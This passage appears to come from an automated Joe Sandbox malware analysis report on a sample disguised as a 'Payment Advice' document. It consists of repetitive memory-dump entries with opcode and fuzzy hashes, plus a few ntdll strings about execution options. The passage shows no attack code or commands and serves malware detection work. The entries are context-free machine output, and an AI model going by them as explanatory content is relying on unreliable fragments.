                                                                                                                                            • Instruction Fuzzy Hash: 65E0EC35A506849BDF53DF9DCA40F5ABBB6BB94B40F190058A5085B664C635AD00CB40
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                            • Instruction ID: 42166771268010f100e552625f676ef0969e25c60babc4a0f83ed91854a1b354
                                                                                                                                            • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                            • Instruction Fuzzy Hash: 8FD0223231203093CF2856D56C00FA3694AEB81A94F0A002C340A93A00C2148C83D2E0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                            • Instruction ID: bba98efd3bd7d3e8c4cad52409d86f95f1941490699b8a96a2b88df598ee9dfb
                                                                                                                                            • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                            • Instruction Fuzzy Hash: 4AD012371D054DBBCB119FA6DC41F957BA9E764BA0F444020B504875A0C63AE990D684
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: acad42dee35cf5bea60e1e70157cca74f170752ec788f1067061d7d2565f6abe
                                                                                                                                            • Instruction ID: 92568caf39814010df97b57436174a857e771262e64cd9776a45bc5ca8860cb5
                                                                                                                                            • Opcode Fuzzy Hash: acad42dee35cf5bea60e1e70157cca74f170752ec788f1067061d7d2565f6abe
                                                                                                                                            • Instruction Fuzzy Hash: E2D0A930A81006CBDF2ACF8CCE10E6EBAB0FB20740B44006CEF0092224E328FC02CB41
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                            • Instruction ID: 2119a6b52d7ccd019e8072386fc3f66b90790a95689bfcb0eb7989130025df91
                                                                                                                                            • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                            • Instruction Fuzzy Hash: 35D09235212A80CFD61B8B0CC9A4B5677B4BB44A44F814490E502CBB62D738D984CA00
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                            • Instruction ID: 632a7c9ab4f7ed2d700d7808251a808310f1db65c2ac4d2932548eff358bc50c
                                                                                                                                            • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                            • Instruction Fuzzy Hash: F5C01232290648AFC712AA99CD41F427BAAEBA8B40F000021F2048B670C631E860EA88
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                            • Instruction ID: 0943505006c23f65172e537e7e55aabeea038fde418cd56d5ff7f9fed2686959
                                                                                                                                            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                            • Instruction Fuzzy Hash: DAD01236100249EFCB01DF41C890DAA772BFBD8B10F10801DFD19076108A31ED63DA50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: fcd9ca366580e9e1a01800719fb0494af4db116d1926b47af4310cdf6d4a487f
                                                                                                                                            • Instruction ID: a9cebcd33b8f355216e9a51fbcff5a8ae28b19724a8e2ef19a70ba482e65cea2
                                                                                                                                            • Opcode Fuzzy Hash: fcd9ca366580e9e1a01800719fb0494af4db116d1926b47af4310cdf6d4a487f
                                                                                                                                            • Instruction Fuzzy Hash: A690023120140842D50075584804B470009D7E1301F55C05AA5124754EC715C9657621
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 022430b8d4eb192ac016ab05fe1f7802b61a274391534c9a52aff052d9d21089
                                                                                                                                            • Instruction ID: d7800075f99acee50c2d121847b126fe7f83731cc29658829784739c1e2f0d54
                                                                                                                                            • Opcode Fuzzy Hash: 022430b8d4eb192ac016ab05fe1f7802b61a274391534c9a52aff052d9d21089
                                                                                                                                            • Instruction Fuzzy Hash: 0790023120140403D500755859087070009D7D1201F55D455A5424658ED756C9656221
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 5c2311355785bd132b678ee6d65437ac829fd5fbd0eb6d63288e7c675f8ac46a
                                                                                                                                            • Instruction ID: 58e67978df178ae8c72aa6846219b6b390b04a53168cfc466015839def8c1a38
                                                                                                                                            • Opcode Fuzzy Hash: 5c2311355785bd132b678ee6d65437ac829fd5fbd0eb6d63288e7c675f8ac46a
                                                                                                                                            • Instruction Fuzzy Hash: B690022160540402D540755858187070019D7D1201F55D055A5024654EC759CB6967A1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 00e628a4dcc6303866213dd221545ebcf1c67ddc7dc1f3e8f9f2bd1e4677d78e
                                                                                                                                            • Instruction ID: e442cf00ad099b6db84ed5080b9f1c04550213cf4ea9d8299fcbf6136219dcab
                                                                                                                                            • Opcode Fuzzy Hash: 00e628a4dcc6303866213dd221545ebcf1c67ddc7dc1f3e8f9f2bd1e4677d78e
                                                                                                                                            • Instruction Fuzzy Hash: AB90023120140402D500799858086470009D7E1301F55D055AA024655FC765C9A56231
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f3f369c335efd0f44fb4aed748163a7a082544524eef306153956c7b6b1f9cb8
                                                                                                                                            • Instruction ID: cecd8b22b9f5d028fe3d510f2c2600ff40f0095fb195ecb2105d82137bc64d90
                                                                                                                                            • Opcode Fuzzy Hash: f3f369c335efd0f44fb4aed748163a7a082544524eef306153956c7b6b1f9cb8
                                                                                                                                            • Instruction Fuzzy Hash: 3990026121140042D504755848047070049D7E2201F55C056A7154654DC629CD755225
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9861bdae28c9bb8122595cc30048e351e8942d929df3a1afdc03de76d70ca940
                                                                                                                                            • Instruction ID: 04bba68092c15ad81bfee5ad6b625319a36721a5d4a2b9cd69d3619e147eca87
                                                                                                                                            • Opcode Fuzzy Hash: 9861bdae28c9bb8122595cc30048e351e8942d929df3a1afdc03de76d70ca940
                                                                                                                                            • Instruction Fuzzy Hash: A990026134140442D50075584814B070009D7E2301F55C059E6064654EC719CD666226
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9eb0b2e8f719b74f5db6efe80644cd2c0ad769f33bf4765a10d739a261a80c4f
                                                                                                                                            • Instruction ID: 35fddf054722259f02bc650cf70bff10800b184f4f2be5fc19f95f81d5006eaa
                                                                                                                                            • Opcode Fuzzy Hash: 9eb0b2e8f719b74f5db6efe80644cd2c0ad769f33bf4765a10d739a261a80c4f
                                                                                                                                            • Instruction Fuzzy Hash: 6E900221211C0042D60079684C14B070009D7D1303F55C159A5154654DCA15C9755621
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 60d8df57d4a2ce644795e7969377070f22ca836ce66bcdb901f3a0f1f93bbdbf
                                                                                                                                            • Instruction ID: ff9983fe463617b709a22a44228111a480aeb148094b11efa06c12e7641a8f0d
                                                                                                                                            • Opcode Fuzzy Hash: 60d8df57d4a2ce644795e7969377070f22ca836ce66bcdb901f3a0f1f93bbdbf
                                                                                                                                            • Instruction Fuzzy Hash: 7F90023120180402D50075584C087470009D7D1302F55C055AA164655FC765C9A56631
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b75127cfc3ed62bf3ef8ea5fe6daa92b8d986decb822163f8277949a7d623588
                                                                                                                                            • Instruction ID: 522526ef645af29ba2bdde2026fc67b43a77af0162ec5a26fd763a650bf997d4
                                                                                                                                            • Opcode Fuzzy Hash: b75127cfc3ed62bf3ef8ea5fe6daa92b8d986decb822163f8277949a7d623588
                                                                                                                                            • Instruction Fuzzy Hash: 2990022160140042454075688C449074009FBE2211755C165A5998650EC659C9795765
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: fdbc2e3ada24834b8088756844176fcf4f0623a2fd11bdc55806137d0e48b4fe
                                                                                                                                            • Instruction ID: 9c441e0548fdf3b7908bb108588633ce84617fe817a1088bee5391b132133c4e
                                                                                                                                            • Opcode Fuzzy Hash: fdbc2e3ada24834b8088756844176fcf4f0623a2fd11bdc55806137d0e48b4fe
                                                                                                                                            • Instruction Fuzzy Hash: 6F90023120180402D50075584C1470B0009D7D1302F55C055A6164655EC725C9656671
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 327c910fa6e155c8b90729b13f3a2b958b4098b53f3f1bc60290975ab853839f
                                                                                                                                            • Instruction ID: fd1828bcf810ad4000e78f73c5bfa659115b1ce055bec4c76218f4f784c288b2
                                                                                                                                            • Opcode Fuzzy Hash: 327c910fa6e155c8b90729b13f3a2b958b4098b53f3f1bc60290975ab853839f
                                                                                                                                            • Instruction Fuzzy Hash: F590022130140402D50275584814607000DD7D2345F95C056E6424655EC725CA67A232
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 482539bf7a8705c6ae4dfee152355fd8bcf00a06bc91f27602c3018cdfcae6a8
                                                                                                                                            • Instruction ID: 42db8883c366a0e2b5d90701125f29f886f42ace7beb2995bf33ee337ee4cdeb
                                                                                                                                            • Opcode Fuzzy Hash: 482539bf7a8705c6ae4dfee152355fd8bcf00a06bc91f27602c3018cdfcae6a8
                                                                                                                                            • Instruction Fuzzy Hash: 4690026120180403D54079584C046070009D7D1302F55C055A7064655FCB29CD656235
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 2c9a6bffedc0a68451a4fcb956086787b355065e46ee3d8f126083983cf9b4f2
                                                                                                                                            • Instruction ID: 15cc7ef1825b4161441bfb9b648e229ef87f4d1e9d2c785235429e117e393da9
                                                                                                                                            • Opcode Fuzzy Hash: 2c9a6bffedc0a68451a4fcb956086787b355065e46ee3d8f126083983cf9b4f2
                                                                                                                                            • Instruction Fuzzy Hash: D990027120140402D540755848047470009D7D1301F55C055AA064654FC759CEE96765
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 72f6ca27080a410b33170c2bbac8b7165b4e59b3b03b8f49115a2d1b111a1267
                                                                                                                                            • Instruction ID: 6e25587ee41c4920ac304671df0758b8ec309acfda2eded910b8f6ce2feb0971
                                                                                                                                            • Opcode Fuzzy Hash: 72f6ca27080a410b33170c2bbac8b7165b4e59b3b03b8f49115a2d1b111a1267
                                                                                                                                            • Instruction Fuzzy Hash: F990022160140502D50175584804617000ED7D1241F95C066A6024655FCB25CAA6A231
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 218e3a52ebe1284e0e1175f52078a961653bcb39de929ee2b9a71a432080addb
                                                                                                                                            • Instruction ID: 61957ad6709ed71abc12fd01df02550f19b33e62d3f29e236c35b7d11350e8d7
                                                                                                                                            • Opcode Fuzzy Hash: 218e3a52ebe1284e0e1175f52078a961653bcb39de929ee2b9a71a432080addb
                                                                                                                                            • Instruction Fuzzy Hash: 9090022120184442D54076584C04B0F4109D7E2202F95C05DA9156654DCA15C9695721
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: df72d992a4cbfe98dffa1a56e5bb4c400616e8927817a8cdc2a5b14ee88e8e5a
                                                                                                                                            • Instruction ID: b2ede5ba8e6f37d758959f277d066c1568759bd2d8bca50aa369dbbda9186582
                                                                                                                                            • Opcode Fuzzy Hash: df72d992a4cbfe98dffa1a56e5bb4c400616e8927817a8cdc2a5b14ee88e8e5a
                                                                                                                                            • Instruction Fuzzy Hash: 3D90022124140802D54075588814707000AD7D1601F55C055A5024654EC716CA7967B1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 3f050a6902430020eaf58b23c7cf743406b636c4557ab3eb43352d2d12170731
                                                                                                                                            • Instruction ID: 24c8eba5b4148e0ecb106565f149debfa7d2b86eb8935d884e507be204479b04
                                                                                                                                            • Opcode Fuzzy Hash: 3f050a6902430020eaf58b23c7cf743406b636c4557ab3eb43352d2d12170731
                                                                                                                                            • Instruction Fuzzy Hash: 2590022124545102D550755C48046174009F7E1201F55C065A5814694EC655C9696321
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a70a96658fd9f2e6c0decde2e4beda66d737d990024a1c8fff638b73d6e0cd99
                                                                                                                                            • Instruction ID: 9b0dc904e54b3f38c82f80217640362e2dcbdb351ed71b7b164199c58c842ac5
                                                                                                                                            • Opcode Fuzzy Hash: a70a96658fd9f2e6c0decde2e4beda66d737d990024a1c8fff638b73d6e0cd99
                                                                                                                                            • Instruction Fuzzy Hash: 3A90023520140402D91075585C04647004AD7D1301F55D455A5424658EC754C9B5A221
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9283b2779a2ba4fc08473be2be270d9770d6311163a98334ab98fe745c8e3ab3
                                                                                                                                            • Instruction ID: 003bed328e40b0f05a465c3ca6e295b78b09987ca5b34a023e8185026ee75ad4
                                                                                                                                            • Opcode Fuzzy Hash: 9283b2779a2ba4fc08473be2be270d9770d6311163a98334ab98fe745c8e3ab3
                                                                                                                                            • Instruction Fuzzy Hash: 9290023120240142994076585C04A4F4109D7E2302B95D459A5015654DCA14C9755321
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                            • Instruction ID: c819e576ecfc7f3c36330631ac9be96764e046f6bb78eccbbab492c6e1fa3edc
                                                                                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                                            Strings
                                                                                                                                            • ExecuteOptions, xrefs: 017146A0
                                                                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01714655
                                                                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01714787
                                                                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01714742
                                                                                                                                            • Execute=1, xrefs: 01714713
                                                                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017146FC
                                                                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01714725
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                            • API String ID: 0-484625025
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __aulldvrm
                                                                                                                                            • String ID: +$-$0$0
                                                                                                                                            • API String ID: 1302938615-699404926
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2234595226.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_1670000_Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.jbxd
